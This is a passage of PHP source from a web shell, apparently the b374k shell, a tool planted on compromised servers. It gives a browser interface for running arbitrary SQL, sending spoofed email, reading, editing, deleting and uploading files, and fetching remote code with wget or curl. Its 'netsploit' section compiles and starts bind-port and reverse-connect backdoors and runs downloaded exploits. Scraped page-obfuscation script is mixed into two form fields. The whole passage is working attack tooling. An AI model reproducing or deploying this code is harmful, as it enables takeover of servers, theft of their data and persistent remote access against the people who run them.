378                     if ($i == $_GET['z']) $head.= "<option value=\"" . $i . "\" selected=\"selected\">" . $i . "</option>";
379                 }
380                 $head.= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
381                 $msg = $msgq . $head . $msg;
382             } elseif (isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")) {
383                 $db = $_GET['db'];
384                 $query = magicboom($_GET['sqlquery']);
385                 $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
386                 @mysql_select_db($db);
387                 $querys = explode(";", $query);
388                 foreach ($querys as $query) {
389                     if (trim($query) != "") {
390                         $hasil = mysql_query($query);
391                         if ($hasil) {
392                             $msg.= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
393                             $msg.= "<table class=\"explore\" style=\"width:99%;\"><tr>";
394                             for ($i = 0;$i < @mysql_num_fields($hasil);$i++) $msg.= "<th>" . htmlspecialchars(@mysql_field_name($hasil, $i)) . "</th>";
395                             $msg.= "</tr>";
396                             for ($i = 0;$i < @mysql_num_rows($hasil);$i++) {
397                                 $rows = @mysql_fetch_array($hasil);
398                                 $msg.= "<tr>";
399                                 for ($j = 0;$j < @mysql_num_fields($hasil);$j++) {
400                                     if ($rows[$j] == "") $dataz = "&nbsp;";
401                                     else $dataz = $rows[$j];
402                                     $msg.= "<td>" . $dataz . "</td>";
403                                 }
404                                 $msg.= "</tr>";
405                             }
406                             $msg.= "</table>";
407                         } else $msg.= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
408                     }
409                 }
410             } else {
411                 $query = "SHOW PROCESSLIST;
412 SHOW VARIABLES;
413 SHOW STATUS;";
414                 $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
415                 $dbs = array();
416                 $msg.= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
417                 $hasil = @mysql_list_dbs($con);
418                 while (list($db) = @mysql_fetch_row($hasil)) {
419                     @array_push($dbs, $db);
420                 }
421                 @sort($dbs);
422                 foreach ($dbs as $db) {
423                     $msg.= "<tr><td><a href=\"?y=" . $pwd . "&amp;x=mysql&amp;sqlhost=" . $sqlhost . "&amp;sqluser=" . $sqluser . "&amp;sqlpass=" . $sqlpass . "&amp;sqlport=" . $sqlport . "&amp;db=" . $db . "\">$db</a></td></tr>";
424                 }
425                 $msg.= "</table>";
426             }
427             @mysql_close($con);
428         } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
429         echo $msg;
430     } else { ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php
431     }
432 } elseif (isset($_GET['x']) && ($_GET['x'] == 'mail')) {
433     if (isset($_POST['mail_send'])) {
434         $mail_to = $_POST['mail_to'];
435         $mail_from = $_POST['mail_from'];
436         $mail_subject = $_POST['mail_subject'];
437         $mail_content = magicboom($_POST['mail_content']);
438         if (@mail($mail_to, $mail_subject, $mail_content, "FROM:$mail_from")) {
439             $msg = "email sent to $mail_to";
440         } else $msg = "send email failed";
441     } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com
442 /* <![CDATA[ */
443 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
444 /* ]]> */
445 " name="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov
446 /* <![CDATA[ */
447 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
448 /* ]]> */
449 " name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php
450 } elseif (isset($_GET['x']) && ($_GET['x'] == 'phpinfo')) {
451     @ob_start();
452     eval("phpinfo();");
453     $buff = @ob_get_contents();
454     @ob_end_clean();
455     $awal = strpos($buff, "<body>") + 6;
456     $akhir = strpos($buff, "</body>");
457     echo "<div class=\"phpinfo\">" . substr($buff, $awal, $akhir - $awal) . "</div>";
458 } elseif (isset($_GET['view']) && ($_GET['view'] != "")) {
459     if (is_file($_GET['view'])) {
460         if (!isset($file)) $file = magicboom($_GET['view']);
461         if (!$win && $posix) {
462             $name = @posix_getpwuid(@fileowner($file));
463             $group = @posix_getgrgid(@filegroup($file));
464             $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
465         } else {
466             $owner = $user;
467         }
468         $filn = basename($file);
469         echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"" . clearspace($filn) . "_link\">" . $file . "</span> <form action=\"?y=" . $pwd . "&amp;view=$file\" method=\"post\" id=\"" . clearspace($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\" /> </form> </td></tr> <tr><td>Size</td><td>" . ukuran($file) . "</td></tr> <tr><td>Permission</td><td>" . get_perms($file) . "</td></tr> <tr><td>Owner</td><td>" . $owner . "</td></tr> <tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr> <tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr> <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=" . $pwd . "&amp;view=" . $file . "\">text</a> | <a href=\"?y=" . $pwd . "&amp;view=" . $file . "&amp;type=code\">code</a> | <a href=\"?y=" . $pwd . "&amp;view=" . $file . "&amp;type=image\">image</a></td></tr> </table> ";
470         if (isset($_GET['type']) && ($_GET['type'] == 'image')) {
471             echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=" . $pwd . "&amp;img=" . $filn . "\"></div>";
472         } elseif (isset($_GET['type']) && ($_GET['type'] == 'code')) {
473             echo "<div class=\"viewfile\">";
474             $file = wordwrap(@file_get_contents($file), "240", "
475 ");
476             @highlight_string($file);
477             echo "</div>";
478         } else {
479             echo "<div class=\"viewfile\">";
480             echo nl2br(htmlentities((@file_get_contents($file))));
481             echo "</div>";
482         }
483     } elseif (is_dir($_GET['view'])) {
484         echo showdir($pwd, $prompt);
485     }
486 } elseif (isset($_GET['edit']) && ($_GET['edit'] != "")) {
487     if (isset($_POST['save'])) {
488         $file = $_POST['saveas'];
489         $content = magicboom($_POST['content']);
490         if ($filez = @fopen($file, "w")) {
491             $time = date("d-M-Y H:i", time());
492             if (@fwrite($filez, $content)) $msg = "file saved <span class=\"gaya\">@</span> " . $time;
493             else $msg = "failed to save";
494             @fclose($filez);
495         } else $msg = "permission denied";
496     }
497     if (!isset($file)) $file = $_GET['edit'];
498     if ($filez = @fopen($file, "r")) {
499         $content = "";
500         while (!feof($filez)) {
501             $content.= htmlentities(str_replace("''", "'", fgets($filez)));
502         }
503         @fclose($filez);
504     } ?> <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php
505 } elseif (isset($_GET['x']) && ($_GET['x'] == 'upload')) {
506     if (isset($_POST['uploadcomp'])) {
507         if (is_uploaded_file($_FILES['file']['tmp_name'])) {
508             $path = magicboom($_POST['path']);
509             $fname = $_FILES['file']['name'];
510             $tmp_name = $_FILES['file']['tmp_name'];
511             $pindah = $path . $fname;
512             $stat = @move_uploaded_file($tmp_name, $pindah);
513             if ($stat) {
514                 $msg = "file uploaded to $pindah";
515             } else $msg = "failed to upload $fname";
516         } else $msg = "failed to upload $fname";
517     } elseif (isset($_POST['uploadurl'])) {
518         $pilihan = trim($_POST['pilihan']);
519         $wurl = trim($_POST['wurl']);
520         $path = magicboom($_POST['path']);
521         $namafile = download($pilihan, $wurl);
522         $pindah = $path . $namafile;
523         if (is_file($pindah)) {
524             $msg = "file uploaded to $pindah";
525         } else $msg = "failed to upload $namafile";
526     } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php
527 } elseif (isset($_GET['x']) && ($_GET['x'] == 'netsploit')) {
528     if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
529         $port = trim($_POST['port']);
530         $passwrd = trim($_POST['bind_pass']);
531         tulis("bdc.c", $port_bind_bd_c);
532         exe("gcc -o bdc bdc.c");
533         exe("chmod 777 bdc");
534         @unlink("bdc.c");
535         exe("./bdc " . $port . " " . $passwrd . " &");
536         $scan = exe("ps aux");
537         if (eregi("./bdc $por", $scan)) {
538             $msg = "<p>Process found running, backdoor setup successfully.</p>";
539         } else {
540             $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
541         }
542     } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
543         $port = trim($_POST['port']);
544         $passwrd = trim($_POST['bind_pass']);
545         tulis("bdp", $port_bind_bd_pl);
546         exe("chmod 777 bdp");
547         $p2 = which("perl");
548         exe($p2 . " bdp " . $port . " &");
549         $scan = exe("ps aux");
550         if (eregi("$p2 bdp $port", $scan)) {
551             $msg = "<p>Process found running, backdoor setup successfully.</p>";
552         } else {
553             $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
554         }
555     } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
556         $ip = trim($_POST['ip']);
557         $port = trim($_POST['backport']);
558         tulis("bcc.c", $back_connect_c);
559         exe("gcc -o bcc bcc.c");
560         exe("chmod 777 bcc");
561         @unlink("bcc.c");
562         exe("./bcc " . $ip . " " . $port . " &");
563         $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
564     } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
565         $ip = trim($_POST['ip']);
566         $port = trim($_POST['backport']);
567         tulis("bcp", $back_connect);
568         exe("chmod +x bcp");
569         $p2 = which("perl");
570         exe($p2 . " bcp " . $ip . " " . $port . " &");
571         $msg = "Now script try connect to " . $ip . " port " . $port . " ...";
572     } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
573         $pilihan = trim($_POST['pilihan']);
574         $wurl = trim($_POST['wurl']);
575         $namafile = download($pilihan, $wurl);
576         if (is_file($namafile)) {
577             $msg = exe($wcmd);
578         } else $msg = "error: file not found $namafile";
579     } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php
580 } elseif (isset($_GET['x']) && ($_GET['x'] == 'shell')) { ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if (isset($_POST['submitcmd'])) {
581         echo @exe($_POST['cmd']);
582     } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php
583 } else {
584     if (isset($_GET['delete']) && ($_GET['delete'] != "")) {
585         $file = $_GET['delete'];
586         @unlink($file);
587     } elseif (isset($_GET['fdelete']) && ($_GET['fdelete'] != "")) {
588         @rmdir(rtrim($_GET['fdelete'], DIRECTORY_SEPARATOR));
589     } elseif (isset($_GET['mkdir']) && ($_GET['mkdir'] != "")) {
590         $path = $pwd . $_GET['mkdir'];
591         @mkdir($path);
592     }
593     $buff = showdir($pwd, $prompt);
594     echo $buff;
595 } ?> </div> </body> </html>